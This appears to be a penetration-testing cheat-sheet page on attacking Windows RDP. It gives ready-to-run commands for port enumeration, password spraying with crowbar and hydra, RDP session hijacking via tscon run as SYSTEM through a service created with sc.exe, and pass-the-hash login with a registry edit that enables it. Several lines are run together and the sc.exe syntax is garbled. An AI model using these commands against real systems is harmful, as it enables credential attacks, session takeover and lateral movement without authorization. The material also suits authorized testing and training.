π₯οΈRDP
Enumeration
nmap -Pn -p3389 192.168.2.143 Misconfiguration
We can try to brute force credentials but a much much better way is to use password-spraying
It works by attempting a single password against multiple usernames before moving on to another password. This can help avoid triggering a password lockout policy.
Crowbar Password Spraying
crowbar -b rdp -s IP/32 -U users.txt -c 'password123'Hydra Password Spraying
hydra -L usernames.txt -p 'password123' IP rdpLogging In
Once we find credentials we can log in with rdesktop or any other software
rdesktop -u founduser -p pass IP
xfreerdp /v:IP /u:founduser /p:pass /cert:ignore +clipboard RDP Session Hijacking
Once successfully connected to can check if our account has local administrator privileges. We can attempt to hijack a user's RDP session.
We can check for logged-on users with either the Task Manager -> Users or PowerShell
PowerShell
whoami
query user
...Impersonate a User
To impersonate a user without their password we need to have SYSTEM privileges
We can then use the tscon.exe binary to connect to the session
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}To obtain SYSTEM privileges we can use tools like Mimikatz or PsExec.
We can create a Windows service that will run as Local System and execute any binary with SYSTEM privileges using the sc.exe binary.
We first choose the service name (hijacksession) the command we want to execute.
query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>me rdp-tcp#13 1 Active 7 8/25/2021 1:23 AM
tommy rdp-tcp#14 2 Active * 8/25/2021 1:28 AM
sc.exe hijacksession binpath= 'cmd.exe /k tscon 2 /dest:rdp-tcp#13'Lastly, we can run
net start hijacksessionThis will start the service a new terminal for the specified user will appear.
Pass The Hash
xfreerdp /v:IP /u:user /pth:hash reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /fLast updated
Was this helpful?